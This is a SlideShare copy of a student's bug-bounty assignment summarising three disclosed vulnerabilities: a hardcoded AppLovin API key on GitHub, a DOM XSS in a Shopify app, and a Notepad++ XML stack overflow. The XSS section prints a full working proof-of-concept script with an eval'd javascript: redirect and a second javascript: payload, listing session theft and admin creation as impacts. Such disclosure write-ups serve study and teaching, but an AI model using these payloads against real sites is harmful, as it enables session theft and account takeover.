SlideShare a Scribd company logo
Sri Lanka Institute of Information Technology
Master of Science (Information Management) Degree Program
Information and Network Security
Assignment 3
Bug bounty
W.M.J.H. Fernando
MS18901290
2
AppLovin API Key hardcoded in a Github repo
Theyfound SensitiveDataExposure ingithub/mopub-android-mediationproject,the AppLovinUIAPIkey
ishardcodedinsource code. The mainimpactis productionAPIkeythenitshouldn'tbe shownpubliclyin
Githubrepo otherwise itcan be used by otherdevelopersasit's a companypropertythe APIkeyshould
be secure as it's a monetize API key.
Thiskeyisusedfor initializationof the app, butAPIKeyshouldnotbe disclosedpubliclyinaGithubrepo.
There are 2 perspective levels.
 Developer perspective
EveryAPI keyhas some certainusage limitandif otherdevelopersuse thissame keythenAPIkey usage
limit will get reduced.
 Attacker perspective
Attacker can use this key to violate GDPR policy because from May 25th 2018 AppLovin compliant with
GDPR and there are certainruleswhichneedtobe followedwhile buildingthe appandif an attacker got
thiskeyhe will violate GDPRrulesandit will be a huge problem to the company. These are some links,
 AppLovinGDPRpolicylink
1. https://www.applovin.com/privacy/
2. https://www.applovin.com/gdprfaqs/
 Mopub GDPR PublisherIntegrationGuide
1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
3
 As perGoogle AppLovinSDKDocs,EUconsentand GDPR
1. https://developers.google.com/admob/android/mediation/applovin
Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and
consentsobtainedfrom,usersinthe EuropeanEconomicArea(EEA)regardingtheuseof deviceidentifiers
andpersonal data.Thispolicyreflectsthe requirementsof the EUePrivacyDirectiveandthe GeneralData
Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your
mediation chain that may collect, receive, or use personal data and provide information about each
network's use. Google currently is unable to pass the user's consent choice to such networks
automatically.
The best way committing the code to Github repo you shouldn't commit your application Key because
you neverknowwhenthingswill gowrong,the API_KEY is alwayscompany propertyand it shouldn'tbe
disclosed publicly.
4
DOM XSS via Shopify.API.remoteRedirect
This problem foundadom xsson the apple-business-chatappthatseemsto be referringto a vulnerable
js file. Foruserswho have installedthisapp,justlethimuse the theme code I providedtocomplete xss.
Modify the theme code to the following payload.
<script>
function attack(){
let ctx=window.open('https://apple-business-chat-
commerce.shopifycloud.com'),interval;
let
payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.dom
ain)`);
interval=setInterval(()=>{
ctx && ctx.postMessage({
"message":"Shopify.API.remoteRedirect",
"data":{
"location":`javascript:eval(atob('${payload}'))`
}
},location.origin);
},500);
window.onmessage=(e)=>{
e.data==="success"&&(
console.log('attack success'),
window.onmessage=null,
clearInterval(interval)
);
};
}
attack();
</script>
<a href="javascript:attack()" style="display:block;text-
align:center;width:100%;height:300px;line-
height:300px;background:#000;color:#fff;">click me start attack</a>
5
As shown below
Then click on the store front page to trigger
Impact
Steal session information, add administrators, etc.
6
Another API is also affected by xss
postMessage({
"message":"Shopify.API.Bar.initialize",
"data":{
pagination: {
next: {
href: "javascript:alert(document.domain)",
target: "new"
},
previous: {
href: "javascript:alert(document.domain)",
target: "new"
}
}
}
});
7
Stack overflow in XML Parsing
Summary:
A stack bufferoverflowvulnerabilityhasbeendetectedinXMLparsingfunctionalityon Notepad++
v7.6.2 (32 bits).
That's due to the fact that _ invisibleEditView.getTextfunctiondoesn'tcheckbufferboundaries.
Description:
Vulnerabilitysrcfile:notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp
Vulnerabilityline:line1008
Variable affected:charencodingStr[128];
Functionthatoverflowsbuffer:_invisibleEditView.getText
Stepsto Reproduce:
1. Create a .xml file withacorrect XML format
2. Introduce a bigXML fieldthatoverflows"encodingStr"buffer.
3. Openthe file withNotepad++andapplicationshouldcrash.
Supporting Material/References:
 BoF_example1.xml->Exploitexample
Impact
An attackercouldcreate a malicious.xml filethattriggersastack bufferoverflow onvictimmachine.
You onlyneedtoopenattached.xml file examplewithNotepad++toreproduce the exploit.
8

More Related Content

Similar to Assingment 3 - Bug bounty

Sst hackathon express
Sst hackathon expressSst hackathon express
Sst hackathon express
Aeshan Wijetunge
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NoSuchCon
 
MacOS Mojave Security Issues
MacOS Mojave Security IssuesMacOS Mojave Security Issues
MacOS Mojave Security Issues
VitaliyMechytashvili
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
Sandeep Joshi
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent Convento
DEVCON
 
Android mobile app security offensive security workshop
Android mobile app security   offensive security workshopAndroid mobile app security   offensive security workshop
Android mobile app security offensive security workshopAbhinav Sejpal
 
How to build and deploy app on Replit
How to build and deploy app on ReplitHow to build and deploy app on Replit
How to build and deploy app on Replit
matiasfund
 
Android reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skypeAndroid reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skype
Mário Almeida
 
From Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in EssenceFrom Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in Essence
Satria Ady Pradana
 
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf
 
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti MohulCsa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Cloud Security Alliance, UK chapter
 
Understanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptxUnderstanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptx
Hexaview Technologies Inc.
 
From Reversing to Exploitation
From Reversing to ExploitationFrom Reversing to Exploitation
From Reversing to Exploitation
Satria Ady Pradana
 
July Patch Tuesday 2019
July Patch Tuesday 2019July Patch Tuesday 2019
July Patch Tuesday 2019
Ivanti
 
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
Jitendra Bafna
 
IRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security AssessmentIRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security Assessment
IRJET Journal
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulatorPrachi Singhal
 
Mobile Apps Develpment - A Comparison
Mobile Apps Develpment - A ComparisonMobile Apps Develpment - A Comparison
Mobile Apps Develpment - A Comparison
Lataant Software Technologies
 

Similar to Assingment 3 - Bug bounty (20)

Sst hackathon express
Sst hackathon expressSst hackathon express
Sst hackathon express
 
Intro to PhoneGap
Intro to PhoneGapIntro to PhoneGap
Intro to PhoneGap
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
 
MacOS Mojave Security Issues
MacOS Mojave Security IssuesMacOS Mojave Security Issues
MacOS Mojave Security Issues
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent Convento
 
Android mobile app security offensive security workshop
Android mobile app security   offensive security workshopAndroid mobile app security   offensive security workshop
Android mobile app security offensive security workshop
 
How to build and deploy app on Replit
How to build and deploy app on ReplitHow to build and deploy app on Replit
How to build and deploy app on Replit
 
Android reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skypeAndroid reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skype
 
From Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in EssenceFrom Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in Essence
 
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
 
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti MohulCsa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
 
Understanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptxUnderstanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptx
 
From Reversing to Exploitation
From Reversing to ExploitationFrom Reversing to Exploitation
From Reversing to Exploitation
 
July Patch Tuesday 2019
July Patch Tuesday 2019July Patch Tuesday 2019
July Patch Tuesday 2019
 
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
 
IRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security AssessmentIRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security Assessment
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulator
 
Mobile Apps Develpment - A Comparison
Mobile Apps Develpment - A ComparisonMobile Apps Develpment - A Comparison
Mobile Apps Develpment - A Comparison
 

More from Jeewanthi Fernando

Assingment 5 - ENSA
Assingment 5 - ENSAAssingment 5 - ENSA
Assingment 5 - ENSA
Jeewanthi Fernando
 
Assingment 4 - DDos
Assingment 4 - DDosAssingment 4 - DDos
Assingment 4 - DDos
Jeewanthi Fernando
 
Assingment 2 - Law
Assingment 2 - LawAssingment 2 - Law
Assingment 2 - Law
Jeewanthi Fernando
 
Assingment 1 - Google haker
Assingment 1 - Google hakerAssingment 1 - Google haker
Assingment 1 - Google haker
Jeewanthi Fernando
 
Ob group presentation
Ob group presentationOb group presentation
Ob group presentation
Jeewanthi Fernando
 
OB group assignment
OB group assignmentOB group assignment
OB group assignment
Jeewanthi Fernando
 
Poster
PosterPoster
Assignment - Maliban
Assignment - MalibanAssignment - Maliban
Assignment - Maliban
Jeewanthi Fernando
 
Assignment 1
Assignment 1Assignment 1
Assignment 1
Jeewanthi Fernando
 
BPM presentation
BPM presentationBPM presentation
BPM presentation
Jeewanthi Fernando
 
Business Process Management Doc
Business Process Management DocBusiness Process Management Doc
Business Process Management Doc
Jeewanthi Fernando
 
Group assingment
Group assingmentGroup assingment
Group assingment
Jeewanthi Fernando
 
Class activity 5
Class activity 5   Class activity 5
Class activity 5
Jeewanthi Fernando
 
Class activity 4
Class activity 4 Class activity 4
Class activity 4
Jeewanthi Fernando
 
Class activity 3
Class activity 3   Class activity 3
Class activity 3
Jeewanthi Fernando
 
Professional networking
Professional networkingProfessional networking
Professional networking
Jeewanthi Fernando
 
Assignment 1
Assignment 1Assignment 1
Assignment 1
Jeewanthi Fernando
 
ALSS Assingment 1
ALSS Assingment 1ALSS Assingment 1
ALSS Assingment 1
Jeewanthi Fernando
 

More from Jeewanthi Fernando (20)

Assingment 5 - ENSA
Assingment 5 - ENSAAssingment 5 - ENSA
Assingment 5 - ENSA
 
Assingment 4 - DDos
Assingment 4 - DDosAssingment 4 - DDos
Assingment 4 - DDos
 
Assingment 2 - Law
Assingment 2 - LawAssingment 2 - Law
Assingment 2 - Law
 
Assingment 1 - Google haker
Assingment 1 - Google hakerAssingment 1 - Google haker
Assingment 1 - Google haker
 
Ob group presentation
Ob group presentationOb group presentation
Ob group presentation
 
OB group assignment
OB group assignmentOB group assignment
OB group assignment
 
Poster
PosterPoster
Poster
 
Assignment - Maliban
Assignment - MalibanAssignment - Maliban
Assignment - Maliban
 
Assignment 1
Assignment 1Assignment 1
Assignment 1
 
BPM presentation
BPM presentationBPM presentation
BPM presentation
 
Business Process Management Doc
Business Process Management DocBusiness Process Management Doc
Business Process Management Doc
 
Group assingment
Group assingmentGroup assingment
Group assingment
 
Class activity 5
Class activity 5   Class activity 5
Class activity 5
 
Class activity 4
Class activity 4 Class activity 4
Class activity 4
 
Class activity 3
Class activity 3   Class activity 3
Class activity 3
 
Professional networking
Professional networkingProfessional networking
Professional networking
 
Assignment 1
Assignment 1Assignment 1
Assignment 1
 
Tesco doc
Tesco docTesco doc
Tesco doc
 
Tesco
TescoTesco
Tesco
 
ALSS Assingment 1
ALSS Assingment 1ALSS Assingment 1
ALSS Assingment 1
 

Recently uploaded

Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
g2nightmarescribd
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 

Recently uploaded (20)

Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 

Assingment 3 - Bug bounty

  • 1. Sri Lanka Institute of Information Technology Master of Science (Information Management) Degree Program Information and Network Security Assignment 3 Bug bounty W.M.J.H. Fernando MS18901290
  • 2. 2 AppLovin API Key hardcoded in a Github repo Theyfound SensitiveDataExposure ingithub/mopub-android-mediationproject,the AppLovinUIAPIkey ishardcodedinsource code. The mainimpactis productionAPIkeythenitshouldn'tbe shownpubliclyin Githubrepo otherwise itcan be used by otherdevelopersasit's a companypropertythe APIkeyshould be secure as it's a monetize API key. Thiskeyisusedfor initializationof the app, butAPIKeyshouldnotbe disclosedpubliclyinaGithubrepo. There are 2 perspective levels.  Developer perspective EveryAPI keyhas some certainusage limitandif otherdevelopersuse thissame keythenAPIkey usage limit will get reduced.  Attacker perspective Attacker can use this key to violate GDPR policy because from May 25th 2018 AppLovin compliant with GDPR and there are certainruleswhichneedtobe followedwhile buildingthe appandif an attacker got thiskeyhe will violate GDPRrulesandit will be a huge problem to the company. These are some links,  AppLovinGDPRpolicylink 1. https://www.applovin.com/privacy/ 2. https://www.applovin.com/gdprfaqs/  Mopub GDPR PublisherIntegrationGuide 1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
  • 3. 3  As perGoogle AppLovinSDKDocs,EUconsentand GDPR 1. https://developers.google.com/admob/android/mediation/applovin Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and consentsobtainedfrom,usersinthe EuropeanEconomicArea(EEA)regardingtheuseof deviceidentifiers andpersonal data.Thispolicyreflectsthe requirementsof the EUePrivacyDirectiveandthe GeneralData Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your mediation chain that may collect, receive, or use personal data and provide information about each network's use. Google currently is unable to pass the user's consent choice to such networks automatically. The best way committing the code to Github repo you shouldn't commit your application Key because you neverknowwhenthingswill gowrong,the API_KEY is alwayscompany propertyand it shouldn'tbe disclosed publicly.
  • 4. 4 DOM XSS via Shopify.API.remoteRedirect This problem foundadom xsson the apple-business-chatappthatseemsto be referringto a vulnerable js file. Foruserswho have installedthisapp,justlethimuse the theme code I providedtocomplete xss. Modify the theme code to the following payload. <script> function attack(){ let ctx=window.open('https://apple-business-chat- commerce.shopifycloud.com'),interval; let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.dom ain)`); interval=setInterval(()=>{ ctx && ctx.postMessage({ "message":"Shopify.API.remoteRedirect", "data":{ "location":`javascript:eval(atob('${payload}'))` } },location.origin); },500); window.onmessage=(e)=>{ e.data==="success"&&( console.log('attack success'), window.onmessage=null, clearInterval(interval) ); }; } attack(); </script> <a href="javascript:attack()" style="display:block;text- align:center;width:100%;height:300px;line- height:300px;background:#000;color:#fff;">click me start attack</a>
  • 5. 5 As shown below Then click on the store front page to trigger Impact Steal session information, add administrators, etc.
  • 6. 6 Another API is also affected by xss postMessage({ "message":"Shopify.API.Bar.initialize", "data":{ pagination: { next: { href: "javascript:alert(document.domain)", target: "new" }, previous: { href: "javascript:alert(document.domain)", target: "new" } } } });
  • 7. 7 Stack overflow in XML Parsing Summary: A stack bufferoverflowvulnerabilityhasbeendetectedinXMLparsingfunctionalityon Notepad++ v7.6.2 (32 bits). That's due to the fact that _ invisibleEditView.getTextfunctiondoesn'tcheckbufferboundaries. Description: Vulnerabilitysrcfile:notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp Vulnerabilityline:line1008 Variable affected:charencodingStr[128]; Functionthatoverflowsbuffer:_invisibleEditView.getText Stepsto Reproduce: 1. Create a .xml file withacorrect XML format 2. Introduce a bigXML fieldthatoverflows"encodingStr"buffer. 3. Openthe file withNotepad++andapplicationshouldcrash. Supporting Material/References:  BoF_example1.xml->Exploitexample Impact An attackercouldcreate a malicious.xml filethattriggersastack bufferoverflow onvictimmachine. You onlyneedtoopenattached.xml file examplewithNotepad++toreproduce the exploit.
  • 8. 8